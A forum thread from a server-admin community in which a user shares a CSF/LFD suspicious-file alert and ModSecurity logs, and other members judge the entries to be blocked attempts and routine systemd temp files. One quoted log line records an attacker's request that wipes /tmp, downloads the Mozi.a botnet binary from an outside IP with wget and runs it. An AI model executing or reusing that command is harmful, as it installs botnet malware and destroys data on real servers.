Hack - Recommendations?

M

Migdiradmin

Verified User
Joined
Jan 5, 2020
Messages
152
After i received Suspicious File Alert from CSF/LFD


Code: 
Time:   Tue Dec xxxxx +0000
File:   /tmp/systemd-private-xxxxxxxxxxxxxxx-httpd.service-VdXVVS/tmp/xxxxxxxxxx-xxxxxNa
Reason: Linux Binary
Owner:  webapps:webapps (1000:1001)
Action: No action taken

And then checking the logs arround the same data:

Code: 
[Tue Dec xxxxxxxxxxx] [:error] [pid 2671:tid 140425135249152] [client 143.198.159.174:40594] [client 143.198.159.174] ModSecurity: Access denied with code 406 (phase 2). Pattern match "^[\\\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/modsecurity.d/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "735"] [id "920350"] [msg "Host header is a numeric IP address"] [data "xxxxxxxxxxxxx"] [severity "WARNING"] [ver "OWASP_CRS/3.3.2"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/6.5.10"] [hostname "1xxxxxxxxxxxxxxxx"] [uri "/tips/tipsSimulationUpload.action"] [unique_id "YcJQlczczxBoAwsDgDExowABfA0"]

[Tue Dec xxxxxxxx] [:error] [pid 2671:tid 140424433665792] [client 143.198.159.174:40594] [client 143.198.159.174] ModSecurity: Multipart: Failed to delete file (part) "/tmp/xxxxxxxxxxxxxx-YcJQlczczxBoAwsDgDExowABfA0-file-eLsTNa" because 1(Operation not permitted) [hostname "xxxxxxxxxxxx"] [uri "/tips/tipsSimulationUpload.action"] [unique_id "YcJQlczczxBoAwsDgDExowABfA0"]



homedir
457 "GET /shell?cd+/tmp;rm+-rf+*;wget+http://74.68.65.171:50030/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1"


Error Log
[Tue Dec 21 22:09:25.830268 2021] [:error] [pid 2671:tid 140425135249152] [client 143.198.159.174:40594] [client 143.198.159.174] ModSecurity: Access denied with code 406 (phase 2). Pattern match "^[\\\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/modsecurity.d/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "735"] [id "920350"] [msg "Host header is a numeric IP address"] [data "xxxxxx"] [severity "WARNING"] [ver "OWASP_CRS/3.3.2"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/6.5.10"] [hostname "xxxxx"] [uri "/tips/tipsSimulationUpload.action"] [unique_id "YcJQlczczxBoAwsDgDExowABfA0"]
[Tue Dec xxxxxxx] [:error] [pid 2671:tid 140424433665792] [client 143.198.159.174:40594] [client 143.198.159.174] ModSecurity: Multipart: Failed to delete file (part) "/tmp/xxxxxxxxxx-YcJQlczczxBoAwsDgDExowABfA0-file-eLsTNa" because 1(Operation not permitted) [hostname "xxxxxxx"] [uri "/tips/tipsSimulationUpload.action"] [unique_id "YcJQlczczxBoAwsDgDExowABfA0"]


Any recommendations?
 
Last edited:
I don't see any hack yet, only attempts.

The first log entry is normal, I have CSF skip those, I've got those too and they are present for all services:
Code: 
drwx------  3 root root 4.0K 2021-12-01 23:18 systemd-private-2495xxxxxxxxxxxxxxxxxxxxxx144-httpd.service-011vFl
drwx------  3 root root 4.0K 2021-12-01 23:18 systemd-private-2495xxxxxxxxxxxxxxxxxxxxxx144-httpd.service-bwwUhF
I masked them with xxx because I don't know if that is important, but same I got for mariadb and other there.

The second log containts some things like that shell thing, but that is the homedir log, my homedir.log is also full of this and these are attempts.

It seems your ModSecurity is blocking things if I read the log correctly.
I would block that ip in CSF anyway.

But at this moment, I don't see a succeeded hack, only attempts.
 
I already checked all logs and i think every thing is ok.

I never had before one email with this lfd warning Suspicious File Alert for the:
/tmp/systemd-private-xxxxxxxx-httpd.service-V......

This is the first email, but if is normal like you said, now my blood pressure is returned to normal :D

Thanks
 
Hello.
Yes, sometimes CSF does send out false alerts too, because often files in /tmp are suspicious.

But if you check more often the /tmp directory you will see that there often will be systemd-private-xxx-some.service files in there.
However, when getting such notices, it's always wise to doublecheck, look at logs etc.

You're welcome.
 
Richard G said:
Yes, sometimes CSF does send out false alerts too, because often files in /tmp are suspicious.
Click to expand...
Yes, sometimes when updating apps from Nextcloud (mail app for example) triggers false CSF alerts
 
You must log in or register to reply here.
Back
Top